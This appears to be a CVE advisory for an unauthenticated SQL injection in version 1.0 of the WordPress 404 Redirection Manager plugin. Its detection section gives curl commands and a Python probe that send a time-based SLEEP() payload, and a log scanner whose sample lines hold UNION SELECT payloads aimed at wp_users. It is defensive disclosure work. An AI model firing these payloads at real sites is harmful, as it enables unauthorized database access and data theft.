CVE-2016-20071
Status: Received - Intake
Unauthenticated SQL Injection in WordPress 404 Redirection Manager Plugin

Publication date: 2026-06-15

Last updated on: 2026-06-15

Assigner: VulnCheck

Description
The 404 Redirection Manager plugin version 1.0 for WordPress contains an unauthenticated SQL injection vulnerability that allows remote attackers to execute arbitrary SQL queries by injecting malicious code through unsanitized user input. Attackers can craft GET requests with SQL injection payloads to manipulate database queries and extract sensitive information from the WordPress database.
Meta Information
Generated: 2026-06-15
EPSS Evaluated: N/A
Affected Vendors & Products
Vendor: 404_redirection_manager
Product: 404_redirection_manager
Version / Range: 1.0
CWE
CWE-89: The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.
Executive Summary

The 404 Redirection Manager plugin version 1.0 for WordPress contains an unauthenticated SQL injection vulnerability. This means that remote attackers can inject malicious SQL code through unsanitized user input in GET requests without needing to log in or authenticate.

By exploiting this flaw, attackers can execute arbitrary SQL queries on the WordPress database, allowing them to manipulate database operations and potentially extract sensitive information.

The vulnerability is due to improper input sanitization in the plugin's code, specifically in the file custom/lib/cf.SR_redirect_manager.class.php on line 356.

Impact Analysis

This vulnerability can have serious impacts including unauthorized access to sensitive data stored in the WordPress database.

Attackers can manipulate database queries, which may lead to data leakage, data corruption, or unauthorized disclosure of confidential information.

Since the vulnerability is unauthenticated and remotely exploitable, it poses a high risk to affected websites, potentially compromising the integrity and confidentiality of the site’s data.

Detection Guidance

This vulnerability can be detected by sending crafted GET requests containing SQL injection payloads to the vulnerable WordPress 404 Redirection Manager plugin endpoints and observing the responses.

A common detection method is time-based SQL injection: inject a payload that makes the database pause (for example MySQL's SLEEP() function, since WordPress runs on MySQL or MariaDB) and confirm the vulnerability by the delayed response.

For example, curl can send a GET request to the front-end endpoint whose handling runs through the vulnerable file (custom/lib/cf.SR_redirect_manager.class.php); the request goes to that endpoint, not to the PHP file or line directly. The page does not name the query parameter, so path_to_plugin_endpoint and param below are placeholders. Let curl URL-encode the payload (a raw quote and spaces in the URL are otherwise rejected or mangled) and have it print the total request time, once for a benign value and once for the SLEEP() payload:

  • curl -s -o /dev/null -w '%{time_total}\n' -G "http://targetsite.com/path_to_plugin_endpoint" --data-urlencode "param=1"
  • curl -s -o /dev/null -w '%{time_total}\n' -G "http://targetsite.com/path_to_plugin_endpoint" --data-urlencode "param=1' AND SLEEP(5)-- -"
  • Compare the two timings: a delay of roughly five seconds on the second request but not the first indicates that the injected SLEEP() executed. A single slow response is not proof; repeat both requests and compare against the baseline, because a loaded host can be slow on its own.

This method does not require authentication and can be automated to scan for the vulnerability, but it executes SLEEP() on the target's database, so run it only against sites you are authorized to test and keep the request rate low.
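The baseline-versus-delay comparison described above, as an added Python example that is not code from the page or the plugin. The endpoint and parameter name are placeholders, since the page does not identify them, and the transport is passed in as a function so the decision logic can be exercised without a live target.

```python
"""Time-based SQL injection probe that compares against a baseline.

Added example; not code from the page or the plugin. The endpoint and
parameter name are placeholders (the page does not identify them).
"""
import statistics
import time
from typing import Callable, Dict
from urllib.parse import urlencode
from urllib.request import Request, urlopen


def build_url(base_url: str, param: str, value: str) -> str:
    """Attach the payload as a properly URL-encoded query parameter."""
    # urlencode percent-encodes the quote, parentheses and spaces so the
    # payload reaches the application exactly as written.
    return f"{base_url}?{urlencode({param: value})}"


def http_get_seconds(url: str, timeout: float = 20.0) -> float:
    """Real transport: wall-clock seconds for one GET request."""
    start = time.monotonic()
    try:
        with urlopen(Request(url, headers={"User-Agent": "sqli-timing-probe"}),
                     timeout=timeout) as resp:
            resp.read()
    except Exception:
        # A 4xx/5xx or a dropped connection still carries timing information.
        pass
    return time.monotonic() - start


def probe_time_based(base_url: str, param: str, delay: int = 5, trials: int = 3,
                     send: Callable[[str], float] = http_get_seconds) -> Dict[str, object]:
    """Send a benign value and a SLEEP() payload, each `trials` times.

    Returns the median timings and a verdict. The verdict requires the
    injected delay to appear on top of the baseline, so a host that is
    simply slow for every request is not reported as vulnerable.
    """
    benign = "1"
    payload = f"1' AND SLEEP({delay})-- -"  # "-- -" keeps the space MySQL needs after "--"
    baseline = [send(build_url(base_url, param, benign)) for _ in range(trials)]
    delayed = [send(build_url(base_url, param, payload)) for _ in range(trials)]
    base_med = statistics.median(baseline)
    delay_med = statistics.median(delayed)
    return {
        "baseline_s": base_med,
        "delayed_s": delay_med,
        # Tolerate jitter, but demand most of the requested delay.
        "vulnerable": (delay_med - base_med) >= 0.8 * delay,
    }


if __name__ == "__main__":
    # Placeholder target; replace with an endpoint you are authorized to test.
    print(probe_time_based("http://targetsite.com/path_to_plugin_endpoint", "param"))
```

Medians over several trials absorb a single network hiccup, and the verdict is relative to the benign baseline rather than an absolute threshold, which is what separates a real SLEEP() from a server that is merely busy.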

Mitigation Strategies

Immediate mitigation steps include removing or disabling the vulnerable 404 Redirection Manager plugin version 1.0 from your WordPress installation.

Since the plugin has been permanently closed and is no longer maintained, updating to a patched version is not possible.

Additional mitigation measures include restricting access to the plugin's endpoints via web application firewall (WAF) rules or other network-level controls to block malicious GET requests containing SQL injection payloads.

Monitoring logs for suspicious GET requests targeting the plugin can help detect exploitation attempts.
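The log-monitoring step above, as an added Python example that is not code from the page or the plugin: it parses combined-format access log lines (constructed here for illustration), percent-decodes each query string repeatedly so double-encoded payloads do not slip past, and flags the same SLEEP() pattern the curl check uses along with UNION and tautology forms. The query parameter name is a placeholder, since the page does not identify the plugin's parameter.

```python
"""Scan web-server access logs for SQL injection probes in GET query strings.

Added example; not code from the page or the plugin. The log lines are
constructed for illustration and the query parameter is a placeholder.
"""
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import unquote_plus

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures checked against the fully decoded query string.
SQLI_PATTERNS = {
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "union-select": re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b", re.I),
    "tautology": re.compile(r"['\"]\s*(or|and)\s+['\"\w]+\s*=", re.I),
}

# Constructed sample: one benign request and two probes, the second double-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Jun/2026:10:01:02 +0000] "GET /?param=1%27+AND+SLEEP%285%29--+- HTTP/1.1" 200 512 "-" "curl/8.0"
198.51.100.7 - - [15/Jun/2026:10:01:05 +0000] "GET /about-us/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [15/Jun/2026:10:01:09 +0000] "GET /?param=1%2527%2520UNION%2520SELECT%2520user_login%252Cuser_pass%2520FROM%2520wp_users HTTP/1.1" 500 0 "-" "curl/8.0"
"""


def decode_fully(s: str, max_rounds: int = 3) -> str:
    """Percent-decode repeatedly; attackers double-encode to evade naive filters."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_access_log(text: str) -> List[Dict[str, object]]:
    """Return one record per request whose query string matches a signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        query = target.partition("?")[2]
        if not query:
            continue
        decoded = decode_fully(query)
        matched = [name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)]
        if matched:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"), "target": target,
                         "decoded_query": decoded, "status": int(m.group("status")),
                         "matches": matched})
    return hits


def count_by_source(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Aggregate by client address; repeated probes from one source stand out."""
    return dict(Counter(str(h["ip"]) for h in hits))


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["matches"], hit["decoded_query"])
    print(count_by_source(scan_access_log(SAMPLE_LOG)))
```

Matching on the decoded query rather than the raw request line is the important detail: a WAF or grep rule that looks for the literal string SLEEP( sees only SLEEP%285 in the log, and sees nothing at all once the attacker double-encodes.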

Consider replacing the plugin with a maintained and secure alternative for managing 404 errors and redirections.

Compliance Impact

The vulnerability allows remote attackers to execute arbitrary SQL queries and extract sensitive information from the WordPress database by exploiting an unauthenticated SQL injection flaw.

Such unauthorized access and potential data extraction could lead to violations of data protection regulations such as GDPR and, for covered entities, HIPAA, which require safeguarding sensitive personal and health information against unauthorized access and breaches.

Therefore, exploitation of this vulnerability could compromise compliance with these standards by exposing sensitive data and failing to maintain adequate security controls.
